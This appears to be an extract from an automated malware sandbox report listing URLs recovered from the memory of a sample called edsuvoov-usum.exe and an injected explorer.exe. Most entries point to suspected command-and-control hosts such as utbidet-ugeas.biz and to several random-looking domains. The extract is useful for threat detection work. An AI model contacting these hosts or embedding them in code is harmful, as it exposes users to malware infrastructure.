Source: edsuvoov-usum.exe, 00000001.00000003.2187880629.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?022EFA881529FA88151CFAA0152EFA06C6BAC2204F2FFA48BD2CF9BE3B1CD4B1271ECAA
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?023421E6213421E6210621CA21342168F2A0194E7B352126893622D00F060FDF130411C
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?023449DD0C3349DD0C0649B50C344953DFA071755635491DA4364AEB220667E43E0479F
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02352D949D322D949D072DBC9D352D1A4EA1153CC7342D5435372EA2B30703ADAF051DB
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3605804760.0000000000782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?023563DBDB3263DBDB0763F3DB35635508A15B738134631B733760EDF5074DE2E90553F
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0235A3ED6032A3ED6007A3C56035A363B3A19B453A34A32DC837A0DB4E078DD4520593C
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0238A005623FA005620AA02D6238A08BB1AC98AD3839A0C5CA3AA3334C0A8E3C5008902
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?023F07D6873807D6870D07FE873F075854AB3F7EDD3E07162F3D04E0A90D29EFB50F37F
Source: edsuvoov-usum.exe, 00000001.00000003.2304275315.00000000007C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0244C4EA6D43C4EA6D76C4C26D44C464BED0FC423745C42AC546C7DC4376EAD35F74F4C
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2952422316.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2963937281.00000000007D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?024859D5D44F59D5D47A59FDD448595B07DC617D8E4959157C4A5AE3FA7A77ECE67869F
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0249C8E2654EC8E2657BC8CA6549C86CB6DDF04A3F48C822CD4BCBD44B7BE6DB5779F8C
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?025085CC3A5785CC3A6285E43A508542E9C4BD646051850C925286FA1462ABF50860B5E
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?025434EAA65334EAA66634C2A654346475C00C42FC55342A0E5637DC88661AD3946404C
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0254F4433754F4433766F46F3754F4CDE4C0CCEB6D55F4839F56F7751966DA7A0564C46
Source: edsuvoov-usum.exe, 00000001.00000003.3629814969.0000000000782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?025868AC8A5F68AC8A6A68848A58682259CC5004D059686C225A6B9AA46A4695B868588
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0259AAD5925EAAD5926BAAFD9259AA5B41CD927DC858AA153A5BA9E3BC6B84ECA0699AF
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2004705819.00000000007C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0259BA88095EBA88096BBAA00959BA06DACD82205358BA48A15BB9BE276B94B13B698AA
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?025A2542705D25427068256A705A25CCA3CE1DEA2A5B2582D85826745E680B7B426A156
Source: edsuvoov-usum.exe, 00000001.00000003.2545177368.00000000007D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?025ACD535A5DCD535A68CD7B5A5ACDDD89CEF5FB005BCD93F258CE657468E36A686AFD7
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?025C90F0795C90F0796E90DC795C907EAAC8A858235D9030D15E93C6576EBEC94B6CA0D
Source: edsuvoov-usum.exe, 00000001.00000003.2051722342.00000000007C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?025D7412245A7412246F743A245D749CF7C94CBA7E5C74D28C5F77240A6F5A2B166D443
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02607BE3D5677BE3D5527BCBD5607B6D06F4434B8F617B237D6278D5FB5255DAE7504BC
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0263D5344564D5344551D51C4563D5BA96F7ED9C1F62D5F4ED61D6026B51FB0D7753E51
Source: edsuvoov-usum.exe, 00000001.00000003.3605804760.0000000000782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0266CF5C6661CF5C6654CF746666CFD2B5F2F7F43C67CF9CCE64CC6A4854E1655456FF7
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?027026E9E57726E9E54226C1E570266736E41E41BF7126294D7225DFCB4208D0D74016C
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2446208623.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2457792216.00000000007C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?027124AD727624AD7243248572712423A1E51C052870246DDA73279B5C430A944041148
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?027812AD6B7F12AD6B4A12856B781223B8EC2A053179126DC37A119B454A3C945948228
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?027931B6B47E31B6B44B319EB479313867ED091EEE7831761C7B32809A4B1F8F8649019
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0279CB82A47ECB82A44BCBAAA479CB0C77EDF32AFE78CB420C7BC8B48A4BE5BB9649FBA
Source: edsuvoov-usum.exe, 00000001.00000003.3605804760.0000000000782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?027A06F3CB7D06F3CB4806DBCB7A067D18EE3E5B917B0633637805C5E54828CAF94A36D
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?027E8E5D79798E5D794C8E75797E8ED3AAEAB6F5237F8E9DD17C8D6B574CA0644B4EBE7
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02807A0D42877A0D42B27A2542807A83911442A518817ACDEA82793B6CB2543470B04A2
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0285DF63EC82DF63ECB7DF4BEC85DFED3F11E7CBB684DFA34487DC55C2B7F15ADEB5EF4
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02883DBC9B8F3DBC9BBA3D949B883D32481C0514C1893D7C338A3E8AB5BA1385A9B80D9
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2737326991.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2761481736.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2775675156.00000000007D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?028C8677478B867747BE865F478C86F99418BEDF1D8D86B7EF8E854169BEA84E75BCB65
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2520151559.00000000007D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?028EBB235C89BB235CBCBB0B5C8EBBAD8F1A838B068FBBE3F48CB81572BC951A6EBE8B0
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?028F97036288970362BD972B628F978DB11BAFAB388E97C3CA8D94354CBDB93A50BFA72
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?028FF41BD188F41BD1BDF433D18FF495021BCCB38B8EF4DB798DF72DFFBDDA22E3BFC43
Source: edsuvoov-usum.exe, 00000001.00000003.3629814969.0000000000782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0292F796E195F796E1A0F7BEE192F7183206CF3EBB93F7564990F4A0CFA0D9AFD3A2C7B
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0296922D8A91922D8AA492058A9692A35902AA85D09792ED2294911BA4A4BC14B8A6A20
Source: edsuvoov-usum.exe, 00000001.00000003.2486210351.00000000007CC000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2486234033.00000000007D3000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2482148761.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2486285890.00000000007D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?0298EF80DD9FEF80DDAAEFA8DD98EF0E0E0CD7288799EF40759AECB6F3AAC1B9EFA8DFA
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2578341460.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2963937281.00000000007D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?029975A1079E75A107AB75890799752FD40D4D095D987561AF9B769729AB5B9835A9458
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2650399591.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3063939839.00000000007D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?029C5E69069B5E6906AE5E41069C5EE7D50866C15C9D5EA9AE9E5D5F28AE705034AC6E4
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02A8ABCE52AFABCE529AABE652A8AB40813C936608A9AB0EFAAAA8F87C9A85F760989BE
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2004705819.00000000007C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02A8EA4905AFEA49059AEA6105A8EAC7D63CD2E15FA9EA89ADAAE97F2B9AC4703798DA6
Source: edsuvoov-usum.exe, 00000001.00000003.3605804760.0000000000782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02AA0963E6AD0963E698094BE6AA09ED353E31CBBCAB09A34EA80A55C898275AD49A394
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02B2F2472FB5F2472F80F26F2FB2F2C9FC26CAEF75B3F28787B0F1710180DC7E1D82C26
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02B85052AFBF5052AF8A507AAFB850DC7C2C68FAF5B9509207BA5364818A7E6B9D88607
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02BF44216EB844216E8D44096EBF44AFBD2B7C8934BE44E1C6BD4717408D6A185C8F740
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02C3651025C4651025F1653825C3659EF6575DB87FC265D08DC166260BF14B2917F3553
Source: edsuvoov-usum.exe, 00000001.00000003.2963937281.00000000007D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02C4799EC2C3799EC2F679B6C2C479101150413698C5795E6AC67AA8ECF657A7F0F449B
Source: edsuvoov-usum.exe, 00000001.00000003.2212630872.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2200877080.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02CD663BDACA663BDAFF6613DACD66B509595E9380CC66FB72CF650DF4FF4802E8FD561
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02D0E53B31D7E53B31E2E51331D0E5B5E244DD936BD1E5FB99D2E60D1FE2CB0203E0D51
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3629814969.0000000000782000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3605804760.0000000000782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02DE65FDB3D965FDB3EC65D5B3DE6573604A5D55E9DF653D1BDC66CB9DEC4BC481EE55D
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02DEF47E9BD9F47E9BECF4569BDEF4F0484ACCD6C1DFF4BE33DCF748B5ECDA47A9EEC45
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3629814969.0000000000782000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2699619982.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2699979474.00000000007D3000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3605804760.0000000000782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02DFBDD99DD8BDD99DEDBDF19DDFBD574E4B8571C7DEBD1935DDBEEFB3ED93E0AFEF8DF
Source: edsuvoov-usum.exe, 00000001.00000002.3818463647.0000000002BF3000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02E9217EECEE217EECDB2156ECE921F03F7D19D6B6E821BE44EB2248C2DB0F47DED9115
Source: edsuvoov-usum.exe, 00000001.00000003.2051722342.00000000007C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02EB193971EC193971D9191171EB19B7A27F21912BEA19F9D9E91A0F5FD9370043DB291
Source: edsuvoov-usum.exe, 00000001.00000003.1879518797.00000000007C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02F373F88DF473F88DC173D08DF373765E674B50D7F2733825F170CEA3C15DC1BFC343D
Source: edsuvoov-usum.exe, 00000001.00000003.2650399591.00000000007D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://utbidet-ugeas.biz/d/N?02F85E4FC9FF5E4FC9CA5E67C9F85EC11A6C66E793F95E8F61FA5D79E7CA7076FBC86E6
Source: edsuvoov-usum.exe, 00000001.00000003.3591112850.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3775491400.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3736886582.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3708336838.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3624471725.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3803613902.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3720200029.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3675870463.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000002.3818092685.00000000007D0000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3808681054.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3591461067.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3780627685.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3629707220.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3531692273.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3591492244.00000000007D7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3691854049.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3648836382.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3605681590.00000000007D4000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3775547966.00000000007D3000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3748340773.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://uutgmfehaouhp.st/
Source: edsuvoov-usum.exe, 00000001.00000003.2124424664.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2111789785.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.2111460280.00000000007C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://uvwabzkyifixf.tk/
Source: edsuvoov-usum.exe, 00000001.00000002.3817754289.000000000074E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wfnsamu.st/L
Source: edsuvoov-usum.exe, 00000001.00000003.2004705819.00000000007C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.utbidet-ugeas.biz/d/N?0216856
Source: edsuvoov-usum.exe, 00000001.00000003.2761481736.00000000007D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.utbidet-ugeas.biz/d/N?022E17715D2917715D1C17595D2E17FF8EBA2FD9072F17B1F52C1447731C39486F
Source: edsuvoov-usum.exe, 00000001.00000003.2724929553.00000000007D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.utbidet-ugeas.biz/d/N?023563DBDB3263DBDB0763F3DB35635508A15B738134631B733760EDF5074DE2E9
Source: edsuvoov-usum.exe, 00000001.00000003.2874261135.00000000007CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.utbidet-ugeas.biz/d/N?023F07D6873807D6870D07FE873F075854AB3F7EDD3E07162F3D04E0A90D29EFB5
Source: edsuvoov-usum.exe, 00000001.00000003.2862072765.00000000007CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.utbidet-ugeas.biz/d/N?025868AC8A5F68AC8A6A68848A58682259CC5004D059686C225A6B9AA46A4695B8
Source: edsuvoov-usum.exe, 00000001.00000003.1633868801.00000000007CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.utbidet-ugeas.biz/d/N?0263D5344564D5344551D51C4563D5BA96F7ED9C1F62D5F4ED61D6026B51FB0D77
Source: edsuvoov-usum.exe, 00000001.00000003.3605804760.00000000007BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.utbidet-ugeas.biz/d/N?0266CF5C6661CF5C6654CF746666CFD2B5F2F7F43C67CF9CCE64CC6A4854E16554
Source: edsuvoov-usum.exe, 00000001.00000003.3009879133.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000003.3803639878.00000000007C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.utbidet-ugeas.biz/d/N?0285DF63EC82DF63ECB7DF4BEC85DFED3F11E7CBB684DFA34487DC55C2B7F15ADE
Source: edsuvoov-usum.exe, 00000001.00000003.2775675156.00000000007D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.utbidet-ugeas.biz/d/N?028C86
Source: edsuvoov-usum.exe, 00000001.00000003.2712709223.00000000007D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.utbidet-ugeas.biz/d/N?028C8677478B867747BE865F478C86F99418BEDF1D8D86B7EF8E854169BEA84E75
Source: edsuvoov-usum.exe, 00000001.00000003.2520337416.00000000007C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.utbidet-ugeas.biz/d/N?028EBB235C89BB235CBCBB0B5C8EBBAD8F1A838B068FBBE3F48CB81572BC951A6E
Source: edsuvoov-usum.exe, 00000001.00000003.2486097619.00000000007DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.utbidet-ugeas.biz/d/N?0298EF80DD9FEF80DDAAEFA8DD98EF0E0E0CD7288799EF40759AECB6F3AAC1B9EF
Source: edsuvoov-usum.exe, 00000001.00000003.3803639878.00000000007C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.utbidet-ugeas.biz/d/N?029C5E69069B5E6906AE5E41069C5EE7D50866C15C9D5EA9AE9E5D5F28AE705034
Source: edsuvoov-usum.exe, 00000001.00000003.2545177368.00000000007D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.utbidet-ugeas.biz/d/N?02B85052AFBF5052AF8A507AAFB850DC7C2C68FAF5B9509207BA5364818A7E6B9D
Source: edsuvoov-usum.exe, 00000001.00000003.2688085840.00000000007C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.utbidet-ugeas.biz/d/N?02DE65FDB3D965FDB3EC65D5B3DE6573604A5D55E9DF653D1BDC66CB9DEC4BC481
Source: edsuvoov-usum.exe, 00000001.00000003.2699979474.00000000007D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.utbidet-ugeas.biz/d/N?02DFBDD99DD8BDD99DEDBDF19DDFBD574E4B8571C7DEBD1935DDBEEFB3ED93E0AF
Source: edsuvoov-usum.exe, 00000001.00000002.3817754289.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, edsuvoov-usum.exe, 00000001.00000002.3817754289.000000000074E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.utbidet-ugeas.biz/d/N?02F85E4FC9FF5E4FC9CA5E67C9F85EC11A6C66E793F95E8F61FA5D79E7CA7076FB
Source: explorer.exe, 00000005.00000003.2211575398.0000000008D2F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1360878216.0000000008D2F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3827739979.0000000008D47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2211822398.0000000008D44000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3078509367.0000000008D47000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: edsuvoov-usum.exe, 00000001.00000003.3214993609.00000000007C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xrkwbwyqovesj.nu/
Source: edsuvoov-usum.exe, 00000001.00000002.3817754289.000000000074E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://yfcalywej.kr//
Source: edsuvoov-usum.exe, 00000001.00000003.3605804760.0000000000782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ylmed.cm/
Source: edsuvoov-usum.exe, 00000001.00000003.3605804760.0000000000782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ylmed.cm/G0X~
Source: edsuvoov-usum.exe, 00000001.00000003.3605804760.0000000000782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ylmed.cm/L
Source: edsuvoov-usum.exe, 00000001.00000003.3605804760.0000000000782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ylmed.cm/f
Source: edsuvoov-usum.exe, 00000001.00000003.3605804760.0000000000782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ylmed.cm/xzK0L~
Source: edsuvoov-usum.exe, 00000001.00000003.3605804760.0000000000782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ylmed.cm/z
Source: explorer.exe, 00000005.00000000.1369884699.000000000BF55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2213041567.000000000BF55000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3830834393.000000000BF55000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppybbwe
Source: explorer.exe, 00000005.00000003.2212309611.000000000BF73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3830834393.000000000BFB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2214265649.000000000BFB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3079859452.000000000BF73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1369884699.000000000BF72000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
